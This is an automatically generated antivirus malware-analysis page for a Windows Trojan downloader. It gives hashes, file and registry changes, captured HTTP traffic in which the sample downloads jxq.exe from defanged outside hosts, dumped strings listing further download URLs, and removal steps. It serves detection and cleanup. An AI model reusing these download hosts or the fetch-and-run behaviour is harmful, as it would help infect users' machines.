Gen.Trojan.Downloader.BnGfaCxftdeb_20dfc3b0e0

by malwarelabrobot on April 25th, 2017 in Malware Descriptions.

Gen:Trojan.Downloader.BnGfaCxftdeb (BitDefender), UDS:DangerousObject.Multi.Generic (Kaspersky), Gen:Trojan.Downloader.BnGfaCxftdeb (B) (Emsisoft), ML.Attribute.HighConfidence (Symantec), Gen:Trojan.Downloader.BnGfaCxftdeb (FSecure), Gen:Trojan.Downloader.BnGfaCxftdeb (AdAware), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, GenericInjector.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 20dfc3b0e03614756ea804abd07638d4
SHA1: fcded78636a909e0cad548fc353a26226e70018b
SHA256: 4357e73a5fe9705eae704c634381847d4dc8cae6245e067ef995021244ab719f
SSDeep: 24576:T bUcnTGxEJuwwEmOhQMrjDsoAnjJo3Hntn5gWaZg4j1q/lNF8Y:KDeELwhYQoc31o3tuZ7j1qXF8
Size: 1501696 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-04-11 06:44:15
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

jxq.exe:3732
1472fd.nbcrirbrv:576
%original file name%.exe:1976

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process jxq.exe:3732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\test.ini (24 bytes)
C:\1472fd.nbcrirbrv (489 bytes)

The Trojan deletes the following file(s):

C:\%original file name%.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1340204 (0 bytes)

The process 1472fd.nbcrirbrv:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\test.ini (36 bytes)
C:\test.ini (4 bytes)

The Trojan deletes the following file(s):

C:\%original file name%.exe (0 bytes)

The process %original file name%.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\jxq.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\test.ini (26 bytes)
C:\test.ini (143 bytes)

Registry activity

The process jxq.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASAPI32]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\jxq_RASAPI32]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process 1472fd.nbcrirbrv:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\1472fd_RASMANCS]
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process %original file name%.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\20dfc3b0e03614756ea804abd07638d4_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\20dfc3b0e03614756ea804abd07638d4_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\20dfc3b0e03614756ea804abd07638d4_RASAPI32]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\20dfc3b0e03614756ea804abd07638d4_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\20dfc3b0e03614756ea804abd07638d4_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\20dfc3b0e03614756ea804abd07638d4_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\20dfc3b0e03614756ea804abd07638d4_RASMANCS]
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
526ebea43d18645ff31b25e36635b1bd	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\1340204\....\TemporaryFile
1df4ec0d0e042803c051b1f24ea6cfbb	c:\jxq.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	1318912	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	1323008	1212416	1208832	5.44894	ceba2364a7e931b68efb631b542cd4ed
.rsrc	2535424	294912	291840	3.20082	0c78aec448e0c7eb91834e18496de638

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://bos.bj.baidubce.n.shifen.com/uptest.txt
hxxp://bos.bj.baidubce.n.shifen.com/jxq.exe
hxxp://mhxy.bj.bcebos.com/uptest.txt	111.206.47.195
hxxp://mhxy.bj.bcebos.com/jxq.exe	111.206.47.195

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /uptest.txt HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: mhxy.bj.bcebos.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 07:11:57 GMT

Content-Type: text/plain

Content-Length: 33

Connection: keep-alive

Content-MD5: EOmHakt1az  xyHER1bSaA==

ETag: "10e9876a4b756b3fbec721c44756d268"

Expires: Thu, 27 Apr 2017 07:11:57 GMT

Last-Modified: Wed, 12 Apr 2017 00:14:30 GMT

Server: BceBos

x-bce-debug-id: MTAuNjMuMTIyLjQwOk1vbiwgMjQgQXByIDIwMTcgMTU6MTE6NTcgQ1NUOjcxNzg3MjkxOQ==

x-bce-request-id: e8bd9f71-d33e-46cd-a504-ecff6767aed2

x-bce-storage-class: STANDARD

hXXp://mhxy.bj.bcebos.com/jxq.exeHTTP/1.1 200 OK..Date: Mon, 24 Apr 20
17 07:11:57 GMT..Content-Type: text/plain..Content-Length: 33..Connect
ion: keep-alive..Content-MD5: EOmHakt1az  xyHER1bSaA==..ETag: "10e9876
a4b756b3fbec721c44756d268"..Expires: Thu, 27 Apr 2017 07:11:57 GMT..La
st-Modified: Wed, 12 Apr 2017 00:14:30 GMT..Server: BceBos..x-bce-debu
g-id: MTAuNjMuMTIyLjQwOk1vbiwgMjQgQXByIDIwMTcgMTU6MTE6NTcgQ1NUOjcxNzg3
MjkxOQ==..x-bce-request-id: e8bd9f71-d33e-46cd-a504-ecff6767aed2..x-bc
e-storage-class: STANDAR..

GET /uptest.txt HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: mhxy.bj.bcebos.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 07:11:26 GMT

Content-Type: text/plain

Content-Length: 33

Connection: keep-alive

Content-MD5: EOmHakt1az  xyHER1bSaA==

ETag: "10e9876a4b756b3fbec721c44756d268"

Expires: Thu, 27 Apr 2017 07:11:26 GMT

Last-Modified: Wed, 12 Apr 2017 00:14:30 GMT

Server: BceBos

x-bce-debug-id: MTAuNjMuMTY5LjM5Ok1vbiwgMjQgQXByIDIwMTcgMTU6MTE6MjYgQ1NUOjY4Njg4NDg2MA==

x-bce-request-id: 6fc2f7ef-3d4f-4aca-9736-0f0a01c16353

x-bce-storage-class: STANDARD

hXXp://mhxy.bj.bcebos.com/jxq.exe....

GET /jxq.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: mhxy.bj.bcebos.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 07:11:27 GMT

Content-Type: application/octet-stream

Content-Length: 2211840

Connection: keep-alive

Content-MD5: HfTsDQ4EKAPAUbHyTqbPuw==

ETag: "1df4ec0d0e042803c051b1f24ea6cfbb"

Expires: Thu, 27 Apr 2017 07:11:27 GMT

Last-Modified: Wed, 12 Apr 2017 00:13:31 GMT

Server: BceBos

x-bce-debug-id: MTAuNjMuMTY5LjM5Ok1vbiwgMjQgQXByIDIwMTcgMTU6MTE6MjcgQ1NUOjY4NzMyOTU3MA==

x-bce-request-id: 97d76d3d-e346-4385-baee-8ec9a4cfb6cf

x-bce-storage-class: STANDARD

MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$........7...Vc..Vc.
.Vc..Jo..Vc..Ih..Vc..Ii..Vc..Jm..Vc..Ip..Vc..Ip..Vc..Vb.:Tc..^>..Vc
..pi.SVc..ph..Vc.bIh..Vc.bIi..Vc..Vc..Vc.MPe..Vc.Rich.Vc..............
...........PE..L....p.X..........................................@....
......................`&..............................................
...,.....!.@o.........................................................
..................................................text...n............
............... ..`.rdata..z........0..................@..@.data...J..
......@..................@....rsrc...@o....!..p...P..............@..@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

1472fd.nbcrirbrv_576:

.text

`.rdata

@.data

.rsrc

t$(SSh

|$D.tm

~%UVW

u$SShe

ntdll.dll

kernel32.dll

shlwapi.dll

urlmon.dll

ws2_32.dll

advapi32.dll

user32.dll

shell32.dll

wininet.dll

URLOpenStreamA

MapVirtualKeyA

keybd_event

MsgWaitForMultipleObjects

UnregisterHotKey

RegisterHotKey

EnumChildWindows

InternetOpenUrlA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpSendRequestA

42305932-06E6-47a5-AC79-8BDCDC58DF61

\test.ini

test.ini

hXXp://mhxy.bj.bcebos.com/uptest.txt

password

hXXp://119.29.114.137/

hXXp://aersaisi.duapp.com/

hXXp://aess.sinaapp.com/

http:/bhsj.applinzi.com/

hXXp://lyhzw.sinaapp.com/

hXXp://jing.applinzi.com/

hXXp://swqs.oss-cn-shenzhen.aliyuncs.com/lyhzw.txt

Function Getcpuid()

Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")

getcpuid=cpu.ProcessorId

Getcpuid

hXXp://update.xyq.163.com/v1_xyqserver2.txt?

1970-10-01

hXXp://mhxy.bj.bcebos.com/test.exe

127.0.0.1

@0.0.0.0

@.reloc

SHLWAPI.dll

WS2_32.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

GDI32.dll

ADVAPI32.dll

WININET.dll

MSVCRT.dll

test.dll

0@\\.\PhysicalDrive0

E.WinInet 1.0

hXXp://

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

program internal error number is %d.

:"%s"

:"%s".

\\.\Scsi0:

\\.\PhysicalDrive0

1.1.3

;3 #>6.&

'2, / 0&7!4-)1#

3A4D4m4

<-<=<]<|<

1%2s2

=!> >0>:>

hXXp://mhxy.bj.bcebos.com/xp.txt

WerFault.exe

%fOQ N

.gXI ]

Windows

'Msgz~

8<<>>>9::

<.ijU

BF.sf

x<>89.gM9j

.nwzY

SPACRt

%UYYY9u

x0.Kx

N.BfE ,

.mooc

.gBc

A[#WEb

im%u3

Mc.ujA

j;%DQ

ËN!KG

.xTlz

fÅ16w/

.rL(4

h`.KPY

UY).NI

!%Dnc

.hG@[/

DSQl

H{$.hK

.TY=RG

{}-.Kd

sû)

1_.qL

Uj9.IgQE1U

**%Ulb

lg[C.ui%

`Zi.pN Q

W.CT{

^-2}%@

1l.Yqg

k.8i%U

"KeY[CW U

.cL!w/I

V.iAu

9%Xb$~

!b.qo

%0sGAva^

qm%9s|=

.ZZV3

'.KEa

y%S}"

K~.DK

!4X5%c.xy

F(<%D

.BU8l

r0%xNz

`.qOv

eSql

%xoIo

JJQu\_-G%d

mB-Z}

--t}&

gUrL

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

MPR.dll

WINMM.dll

VERSION.dll

RASAPI32.dll

WinExec

GetWindowsDirectoryA

GetKeyState

ExitWindowsEx

GetViewportOrgEx

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

WSOCK32.dll

HttpQueryInfoA

InternetCrackUrlA

InternetCanonicalizeUrlA

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

%x.tmp

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

libpng error: %s

libpng warning: %s

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

hXXp://mhxy.bj.bcebos.com/jxq.exe

C:\1472fd.nbcrirbrv

#include "l.chs\afxres.rc" // Standard components

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>

1.0.0.0

(hXXp://VVV.dywt.com.cn)

(*.*)

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

jxq.exe:3732
1472fd.nbcrirbrv:576
%original file name%.exe:1976
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\test.ini (24 bytes)
C:\1472fd.nbcrirbrv (489 bytes)
C:\test.ini (4 bytes)
C:\jxq.exe (148 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Trojan.Downloader.BnGfaCxftdeb_20dfc3b0e0

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Trojan.Downloader.BnGfaCxftdeb_20dfc3b0e0

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet